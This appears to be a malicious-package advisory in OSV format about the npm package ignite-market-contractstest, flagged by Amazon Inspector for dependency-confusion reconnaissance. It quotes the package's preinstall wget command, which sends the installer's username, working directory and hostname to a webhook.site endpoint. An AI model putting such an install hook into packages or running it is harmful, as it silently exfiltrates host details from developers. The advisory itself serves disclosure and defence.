{"id":"MAL-2026-4583","summary":"Malicious code in ignite-market-contractstest (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da)\npackage.json declares a preinstall lifecycle hook that runs `wget --quiet \"https://webhook.site/64063d25-fcd3-44e5-a454-34845bc63250/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\"`. On every `npm install`, this exfiltrates the installer's username, current working directory, and hostname to a third-party request-logging endpoint controlled by the package author, without consent. The package metadata is placeholder (author 'me', empty description, version 0.0.9), the name `ignite-market-contractstest` is shaped like a dependency-confusion target against an internal `ignite-market-contracts` package, and it depends on `seaport-core-16` — a similarly suspicious name in the OpenSea seaport namespace. The combination of unconsented host-identifier exfiltration on install, dependency-confusion-shaped naming, and placeholder metadata is the canonical reconnaissance shape used to validate that an internal package name is reachable on the public registry.\n","modified":"2026-05-26T06:02:37.197998228Z","published":"2026-05-22T00:13:31Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-004099","sha256":"b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da","import_time":"2026-05-26T05:51:56.202874273Z","source":"amazon-inspector","versions":["0.0.9"],"modified_time":"2026-05-22T00:13:36Z"},{"id":"IN-MAL-2026-004098","sha256":"ba1152fed442631b3d367dc51ba9b70ee92938e4a53f3152480cbf46df403a3e","import_time":"2026-05-26T05:51:56.11193869Z","source":"amazon-inspector","versions":["9.0.0"],"modified_time":"2026-05-22T00:13:31Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/ignite-market-contractstest/v/0.0.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/ignite-market-contractstest/v/9.0.0"}],"affected":[{"package":{"name":"ignite-market-contractstest","ecosystem":"npm","purl":"pkg:npm/ignite-market-contractstest"},"versions":["0.0.9","9.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ignite-market-contractstest/MAL-2026-4583.json","indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-UNpm2Dd4TyjHUomdqO/GVr+Rm8MLsdXBH3maSxkqn4XiXJKtm0+0229MAlxP6xvuAWsR/VDlb2ZXv39qHQUAIA==","sha1":"f0529593349956ac8610d3c2c4e79c90263f2b61"},"filename":"ignite-market-contractstest-0.0.9.tgz"}],"evidence_files":[{"sha256":"393d749206f15c50826b3a2eede2784461e8439f27f8ccb68ef93680d1abf9eb","path":"package.json","tlsh":"bcf07d79a630ea1b1ac64f500820929ff671fa0b94412e0dde7323dd818e9db2439458"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}